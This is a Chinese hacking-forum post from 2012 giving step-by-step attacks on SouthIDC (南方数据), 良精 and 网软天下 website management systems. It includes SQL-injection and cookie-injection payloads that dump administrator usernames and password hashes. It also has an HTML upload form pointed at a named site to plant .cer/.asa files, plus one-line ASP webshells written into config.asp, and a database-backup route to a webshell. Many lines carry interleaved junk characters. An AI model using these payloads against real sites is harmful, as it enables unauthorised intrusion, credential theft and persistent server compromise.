找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2458|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
$ k& [0 r; D$ t3 R& `1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 . e' U3 I7 `1 X5 n$ g% D/ f7 J
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
( V6 x8 l8 v2 D) f# N3 p直接暴管理员帐号密码(md5)
. J5 {: E% V8 a" C& ]9 ~2.登陆后台
! P1 }# `! x/ [6 y3.利用编辑器上传:
+ |; U& k" p- x5 O/ S) v访问admin/southidceditor/admin_style.asp3 ?6 A" G; ^) G" X  e8 D4 y; Y
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
4 ]% Y! \& O  V% {" m
4 g: d* L) K  q6 ^6 p========================================
& E. T' E; t1 i+ h; a$ s: m' A- W9 B' z9 b  a, W
参考资料整理:& H% p- J6 m5 H9 n+ s
南方数据、良精系统、网软天下漏洞利用
9 p2 v. u# i/ q- b. E' e  c
. j) m( T( d+ g. n$ |1、通过upfile_other.asp漏洞文件直接取SHELL3 E. P0 n+ I" `6 Y! C3 o
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:1 D8 r; H, D" y& y% q
<HTML><HEAD>
$ k/ _) H- }4 Z7 n! P7 m, ~<META http-equiv=Content-Type content="text/html; charset=gb2312"> " K& v# s9 J. T$ y' G3 A9 b0 W% }" \
<STYLE type=text/css>BODY {
/ Y$ v$ B6 d# |# V6 lFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
1 H8 i- g& h- ?/ [: B, ^) ]}
6 p. h" O8 w( D2 Y, W.tx1 {
6 P1 {% k4 f/ i2 z' L. fBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px 9 }9 o$ K+ u3 }& q& j4 B6 I, R
}
) L. b0 y* A5 |$ c; w$ u& d  k5 ^</STYLE>- I$ ?; _3 K& |" ~0 v3 m
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
+ ~5 x4 i# {; n+ J* ?<BODY leftMargin=0 topMargin=0> : u- ]* h0 ~2 n1 g$ ^5 L
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
- A! Y* H, ~3 E, {7 h6 ]encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
# T8 c$ O6 i/ z! B; Q' c7 ^<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>4 z  I6 {& y( X2 a' W* Q# y

# S: n6 A# X0 C) o将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。8 b2 s, k4 d/ R
注:此方法通杀南方数据、良精系统、网软天下等- A7 g% ~' i5 U

" }* a, m2 [# R/ I/ j/ @2、通过注入秒杀管理员帐号密码,使用如下:
2 ~0 g8 Y: x. ]7 `http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’  ?1 ~" x" ?7 m! J' z
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
6 S' I# V6 |, X: }# |) G2 s在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
' j7 R8 i5 |1 A* e! }7 W# G3 T# V成功把shell写入http://www.target.com/inc/config.asp
0 o' y) e! P, a9 x; e这里一句话chr(32)密码是“#”- l' j' H- @8 s
3、cookie注入
% g4 D% T3 Y# L9 s; Z7 d" B6 m清空地址栏,利用union语句来注入,提交:1 Y5 l( Y  d1 Z4 u/ x0 V7 f
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
( j+ F: V: w) [% t% N如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
( h2 l9 T7 Q- v3 C5 J0 l( \/ ]* ?注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
1 K# m( x6 q4 d9 Q" \& f( X3 Q# y& r(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)  K# ]  N3 r' T" X! s. D) A
8 \6 R! f7 o; `* G/ e
三、后台取SHELL方法总结3 u/ Q1 W1 c) o* \' D
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:4 B& Q  Q3 M# m. ~8 s* F" ]
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,. @# ]. X; [- z. o! x
这时再打开一句话马的客户端,提交同样得到一个小马
, r: B0 p( j! j9 L. x! I0 ](注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)5 j$ G- t3 N# c1 O$ i( U* J, j
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:) `6 D: z& l9 L, c1 J/ j
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then% ^3 R4 [5 b; K3 C& u
EnableUpload=false
  j. W2 m) \) M5 ?7 v! D& j
6 ]& E! Z* Q4 X1 t/ Cend if / R; T2 e6 A. A0 h' C+ m  N
if EnableUpload=false then3 m* Q9 G0 t! E. k, o
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
0 w6 o* G# w6 Q/ k; C) y$ a1 kFoundErr=true
: k1 C" ]. M! v3 x3 Y( Nend if0 Z. B: F( F, T5 ~: E
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:) e- m! f' M# C- R$ u
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)* c# I3 b: q# P" u: [' _
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的/ d6 ?3 y. i$ J! o5 m
, y. ~0 p1 x, A, e- q
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
# B9 e- r2 {* A9 I/ `直接访问备份后的地址,就得到一个webshell
1 ~- E* L; C4 ?: D" `  i! @! c(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表